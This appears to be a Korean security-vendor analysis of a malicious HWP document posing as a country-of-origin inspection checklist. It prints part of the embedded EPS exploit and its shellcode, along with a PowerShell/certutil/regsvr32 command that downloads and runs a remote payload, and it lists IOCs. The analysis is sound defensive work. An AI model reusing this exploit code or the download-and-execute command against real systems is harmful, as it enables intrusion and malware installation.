‘원산지 조사 자율 점검표’ 한글(HWP) 악성코드 유포

ASEC 분석팀은 7월 23일 악성 EPS를 포함한 한글 문서가 유포되고 있음을 확인하였다. 문서에 포함된 악성 PS(Post Script)파일의 주요 행위는 7월 15일 아래의 글을 통해 확인한 코로나 예측 결과 위장 엑셀문서와 유사하다. 해당 문서에는 원산지 조사 자율 점검표가 존재하며, 문서 정보로 보아 실제 ‘국가법령정부센터’에서 제공한 문서를 악의적으로 가공한 것으로 추정된다.

https://asec.ahnlab.com/1355

한글 문서 내용
문서 정보

한글문서 첫 페이지 우측 상단에는 아래의 그림과 같이 사용자가 알아차리기 어려운 형태로 PS 파일이 존재한다.

문서 내부에 포함된 ps파일

해당 PS 파일에는 7월 15일에 공유한 코로나 예측결과 관련 악성 엑셀(xls) 문서와 유사한 CMD 명령어를 수행하는 쉘코드가 삽입되어 있다. 한글문서에 포함된 EPS 스크립트 코드는 다음과 같다.

/buffer1 16#FFFF def /buffer2 buffer1 array def /buffer3 (poor) def /buffer4 1 array def /buffer5 0 def /buffer_str_count 16#100 def /buffer7 buffer_str_count array def /buffer8 16#8 def /buffer9 16#18F0 def /buffer_second_array 16#31E array def /buffer11 16#215 array def /buffer12 16#1 array def /buffer_spray { buffer_second_array aload 16#10 { buffer11 aload }
<중략>
5589E581EC0002000060E8000000005A83C21131C0B94D02000080327742E2FA9F777777772DF6B51F75777746B7CE17777777F7453335958D13D647777777FC377BFC0763DAE1DAFC2F67FC244B76ADFC250F76ADFC055776A946BE36DA76AFF64F301203270283F60F7305181436029CFC055376A911FC7B393EFC056B76A9FC63F976ADFE22779F7F777777201E19320F12147724882277FE328B9F7B777777320F1E03270518141204047724882277FE32939F7A7777773B1816133B1E150516050E367724882277FE328F9F707777771A04011405037788228FFE32839F70777777040E0403121A77880283882277FE32879F7077777702051B1A18197788228FFE329B9F6477777722253B331800191B1816132318311E1B12367788029B882277FE329F1D771D779F6D777777344D2B2705181005161A331603162B36243324011459120F12779F417777771F0303074D585819120F031B1201121B1B1E011E1910590705185800075A1E19141B02131204583E33445804161A071B12591D0710771D7788229F1D779F21767777344D2B2705181005161A331603162B36243324011459120F12575814571413575813575203121A07525751570718001205041F121B1B575F1912005A18151D12140357240E0403121A5939120359201215341B1E1219035E59331800191B181613311E1B125F501F0303074D585819120F031B1201121B1B1E011E1910590705185800075A141819031219035802071B18161304581D042814181A0718041205581E1A16101204584F14454741154F465A114215465A434543455A4F4313445A454440141240454F1111444259071F0748021E134A47295102130F4A3033363666356334333939303635376434616633376263343730653065663937636864631B636D6462642721363031302D2864692021272B2021641B642337267073056A3029347E60646264202128641B64646264302D29212B313064736462643621233732367776646B37642337267073056A3029347E6044BB11B8BB11A06181C4000200005D9000000000

쉘코드 실행 시, hxxp://nextlevelliving[.]pro/wp-includes/ID3/sample.jpg에 접속하여 데이터를 받아 C:ProgramDataASDSvc.exe로 저장한다. 다운로드된 파일은 정상 cmd 프로그램(cmd.exe)으로 cmd 명령어를 수행하는데 사용된다. 실행되는 명령어는 다음과 같다.

C:ProgramDataASDSvc.exe /c cd /d %temp%& powershell (new-object system.Net.WebClient).DownloadFile(‘hxxp://nextlevelliving.pro/wp-content/uploads/js_composer/images/8c206b81-f5b1-4242-84d3-237ce728ff35.php?uid=0^&udx=[랜덤값]’, ‘_’)& certutil -decode _ gsb47A.tmp:$& del _  & timeout 7& regsvr32 /s gsb47A.tmp:$

“ASDSvc.exe”는 자사의 실행 파일명과 동일하며, 이는 악의적인 행위를 자사에서 수행하는 정상 서비스처럼 보이도록 위장한것으로 추정된다. 다운받아진 파일은 최종적으로 regsvr32에 로드되어 실행되며, hxxp://www.trebat[.]co/wp-content/uploads/2018/03/new-blue-container[.]jpg 와 통신하며 추가 악성 행위를 수행한다. 만일 다운로드 URL을 웹 브라우저로 접속 시 아래와 같은 정상적인 그림 파일을 다운받게 된다.

정상 그림 파일

최근 MS Office와 한글을 이용한 악성 파일이 다량 유포되고 있어 사용자의 각별한 주의가 필요하다. 발신인이 확실하지 않은 메일에 첨부된 파일은 저장/실행을 지양해야 한다.

현재 V3 제품에서는 관련 파일에 대하여 아래의 진단명으로 탐지하고 있다.

[파일 진단]

  • Exploit/HWP.Generic (2020.07.23.08)
  • Backdoor/Win64.Akdoor.C4167869 (2020.07.23.08)

[관련  IOC 정보]

C2

  • hxxp://www.trebat.co/wp-content/uploads/2018/03/new-blue-container.jpg
  • hxxp://nextlevelliving[.]pro/wp-content/uploads/js_composer/images/8c206b81-f5b1-4242-84d3-237ce728ff35.php
  • hxxp://nextlevelliving[.]pro/wp-includes/ID3/sample[.]jpg

HASH

  • 6F40A7391301D9201CE3EA48EC2A4DF3
  • D50859C80C5DA10CC6C262F41B33508F
0 0 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments